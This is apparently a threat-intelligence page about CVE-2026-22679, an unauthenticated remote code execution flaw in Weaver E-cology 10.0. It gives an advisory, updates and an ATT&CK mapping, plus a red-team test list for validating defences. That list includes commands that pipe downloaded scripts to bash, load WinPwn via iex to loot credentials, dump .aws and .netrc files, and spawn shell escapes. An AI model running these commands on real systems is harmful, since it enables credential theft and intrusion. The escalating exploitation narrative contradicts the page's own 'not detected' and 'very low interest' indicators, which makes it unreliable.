CVE-2026-22679

CRITICAL POC TTE Zero-Day Pub 07/04 Upd 05/05

Overview

This vulnerability is an unauthenticated remote code execution flaw caused by exposed debug functionality within the Weaver E-cology 10.0 platform. The root cause lies in the insufficient access control on the /papi/esearch/data/devops/dubboApi/debug/method endpoint, which processes attacker-controlled parameters without validation. This allows direct invocation of internal command-execution helpers via crafted POST requests targeting interfaceName and methodName parameters.

Vulnerability Description

Weaver (Fanwei) E-cology 10.0 versions prior to 20260312 contain an unauthenticated remote code execution vulnerability in the /papi/esearch/data/devops/dubboApi/debug/method endpoint that allows attackers to execute arbitrary commands by invoking exposed debug functionality. Attackers can craft POST requests with attacker-controlled interfaceName and methodName parameters to reach command-execution helpers and achieve arbitrary command execution on the system. Exploitation evidence was first observed by the Shadowserver Foundation on 2026-03-31 (UTC).

Impact

An unauthenticated attacker can execute arbitrary system commands remotely by exploiting this flaw, requiring only network access to the vulnerable endpoint. This enables full compromise of the affected system, including data exfiltration, service disruption, and lateral movement within the network. The vulnerability's CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms no authentication or user interaction is required, increasing the likelihood of exploitation in exposed environments.

Solution

Apply the security update provided by Weaver Network Co., Ltd. that addresses this vulnerability by removing or securing the exposed debug endpoint. The fixed version is 20260312 or later, as detailed in the vendor advisory at https://www.weaver.com.cn/cs/securityDownload.html#. Organizations should immediately upgrade to this version to mitigate the risk of exploitation.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability in Weaver E-cology 10.0 prior to version 20260312 presents a significant risk due to its unauthenticated remote code execution capabilities. This flaw resides in the debug functionality exposed through the /papi/esearch/data/devops/dubboApi/debug/method endpoint. Attackers can exploit this vulnerability by sending specially crafted POST requests that manipulate the interfaceName and methodName parameters. By doing so, they can invoke command-execution helpers, leading to the execution of arbitrary commands on the affected system. The lack of authentication checks allows unauthorized users to access this endpoint, making it particularly dangerous as it can be exploited without any legitimate credentials.

The attack vectors for this vulnerability are straightforward yet highly effective. An attacker could utilize tools such as cURL or Postman to send crafted requests to the vulnerable endpoint, specifying malicious payloads in the parameters. The exploitation process could be automated through scripts, enabling attackers to target multiple instances of the software simultaneously. Scenarios include deploying web shells, exfiltrating sensitive data, or even pivoting to other systems within the network. Given the ease of exploitation, this vulnerability poses a severe threat to any organization utilizing the affected versions of Weaver E-cology.

The real-world impact of this vulnerability is profound, particularly for businesses relying on Weaver E-cology for critical operations. The potential for arbitrary command execution means that attackers could gain full control over the affected systems, leading to data breaches, service disruptions, and significant financial losses. The high CVSS score of 9.8 underscores the critical nature of this vulnerability, indicating that successful exploitation could result in severe consequences. Organizations could face reputational damage, regulatory fines, and loss of customer trust, further compounding the risks associated with this vulnerability.

To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. First, immediate steps should include upgrading to the latest version of Weaver E-cology that addresses this vulnerability. Regularly monitoring logs for unusual activity, particularly around the debug endpoint, can help identify potential exploitation attempts. Additionally, employing web application firewalls (WAFs) can provide an extra layer of defense by filtering out malicious requests before they reach the application. Organizations should also consider implementing strict access controls and authentication mechanisms to limit exposure to sensitive endpoints.

In conclusion, the unauthenticated remote code execution vulnerability in Weaver E-cology represents a critical threat that organizations must address promptly. The simplicity of exploitation, coupled with the potential for devastating impacts, necessitates immediate action. By adopting proactive detection and mitigation strategies, organizations can protect their systems from this and similar vulnerabilities, thereby reducing their overall risk profile in an increasingly complex cybersecurity landscape.




CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the Weaver E-cology vulnerability, with telemetry indicating initial active reconnaissance and exploitation activity emerging in the wild. This development elevates the practical risk associated with CVE-2026-22679, as the vulnerability is no longer theoretical but demonstrably leveraged by threat actors. The updated CVSS score to 9.8 reflects the critical severity and ease of exploitation, while the EPSS increase, though still low, signals growing likelihood of exploitation attempts. For defenders, this shift underscores an urgent need to prioritize detection and response capabilities around the exposed debug endpoint, as exploitation can lead to full remote code execution without authentication. The evolving threat landscape suggests that adversaries may soon integrate this vulnerability into broader attack campaigns, potentially including ransomware operators seeking initial access vectors. Consequently, the threat level has risen from a latent risk to an active and critical concern requiring heightened vigilance.



Update 2 — April 20, 2026

CSURFACE threat intelligence has identified the emergence of a public proof-of-concept exploit targeting CVE-2026-22679, marking a critical shift from theoretical risk to practical exploitation capability. This development is accompanied by a measurable increase in the Exploit Prediction Scoring System (EPSS) score, reflecting heightened attacker interest and a greater likelihood of active exploitation attempts. Our telemetry indicates that this vulnerability is now more accessible to a wider range of threat actors, including those with limited technical resources, due to the availability of detailed exploit code on public platforms. This expansion of the exploit landscape significantly elevates the threat posture, as unauthenticated remote code execution via the exposed debug endpoint can facilitate rapid system compromise. The increased ease of exploitation and growing public visibility raise the probability that ransomware groups and other opportunistic adversaries will integrate this vulnerability into their attack chains. Consequently, the risk level has escalated from a latent concern to an immediate and critical threat, necessitating intensified monitoring and response efforts focused on this vector.



Update 3 — May 16, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the Weaver E-cology vulnerability, evidenced by a significant surge in detection activity across our sensors. Although the EPSS score has declined, indicating a lower statistical likelihood of widespread exploitation, the recent upward trend in telemetry suggests increasing attacker interest and active probing. This divergence underscores a shifting threat dynamic where opportunistic adversaries, including ransomware operators, may be intensifying reconnaissance and initial access efforts despite broader exploit adoption remaining limited. The availability of new proof-of-concept exploits further lowers the barrier for exploitation, amplifying the risk of rapid compromise. Consequently, the threat level has intensified from a latent to a more immediate concern, warranting heightened vigilance as adversaries appear poised to leverage this critical unauthenticated remote code execution vulnerability more aggressively.



Update 4 — July 25, 2026

CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the Weaver E-cology vulnerability, with a discernible increase in adversary activity leveraging the unauthenticated remote code execution flaw. This surge coincides with the wider dissemination of new proof-of-concept exploits, which have lowered the technical barriers for threat actors to weaponize the vulnerability. Our telemetry indicates that while the overall exploitation trend remains stable, the intensity and frequency of targeted reconnaissance and initial access operations have intensified, suggesting a shift from opportunistic scanning to more deliberate intrusion efforts. This development is particularly concerning given the critical severity of the vulnerability and its unauthenticated nature, which enables attackers to execute arbitrary commands without prior access. The evolving threat landscape now reflects a heightened risk of rapid compromise, especially as ransomware groups and other financially motivated actors increasingly incorporate this vector into their attack chains. Consequently, the threat level associated with CVE-2026-22679 has escalated from a latent to an imminent concern, underscoring the urgency for defenders to prioritize detection and response capabilities focused on this exploit.



Update 5 — August 16, 2026

CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting the Weaver E-cology vulnerability, reflected by a modest uptick in telemetry detections. While the overall exploitation trend remains stable, this incremental rise signals continued adversary interest and persistent probing of the exposed debug endpoint. The availability of a public proof-of-concept exploit continues to lower the barrier for threat actors, including financially motivated groups such as ransomware operators, to leverage this critical unauthenticated remote code execution flaw. Although the current EPSS score remains steady, the observed activity underscores the vulnerability’s sustained attractiveness as an attack vector. Consequently, the threat level associated with CVE-2026-22679 remains elevated, reinforcing its status as a high-priority concern for defenders who must maintain vigilant detection and response postures to counter ongoing exploitation efforts.

Affected Products (1)

Vendor Product Version CPE
weaver Weaver E-Cology All cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

GitHub PoCs (1)

Repository Author Stars Forks Date Link
keraattin/CVE-2026-22679
Critical RCE vulnerability (CVSS 9.3) in Weaver E-cology platform versions prior to build 20260312. Unauthenticated remo...
keraattin 4 0 2026-04-16 View
Exploited in Wild NOT DETECTED
Ransomware NOT ASSOCIATED
Attacker Interest VERY LOW
Sightings Some sightings

Threat Feed

13 events
2026-08-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-21
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-20
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-05
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-05-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-16
PoC Published (1 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2026-04-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

OS Command Injection
98% command_injection
Remote Code Execution
92% rce
Code Injection
74% code_injection
Authentication Bypass
67% auth_bypass

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-62 Cross Site Request Forgery
39%
High Very High
CAPEC-12 Choosing Message Identifier
39%
High High
CAPEC-36 Using Unpublished Interfaces or Functionality
35%
Medium High
CAPEC-166 Force the System to Reset Values
30%
Medium
CAPEC-216 Communication Channel Manipulation
30%

Red Team Playbook

44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (5)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2026-22679
weaver.com.cn
GitHub CVE release-notes
https://www.weaver.com.cn/cs/securityDownload.html#
h4cker.zip
GitHub CVE technical-description exploit
https://h4cker.zip/post/d5d211/
ti.qianxin.com
GitHub CVE third-party-advisory
https://ti.qianxin.com/vulnerability/notice-detail/1760
vulncheck.com
GitHub CVE third-party-advisory
https://www.vulncheck.com/advisories/weaver-e-cology-unauthenticated-rce-via-dubboapi-debug-endpoint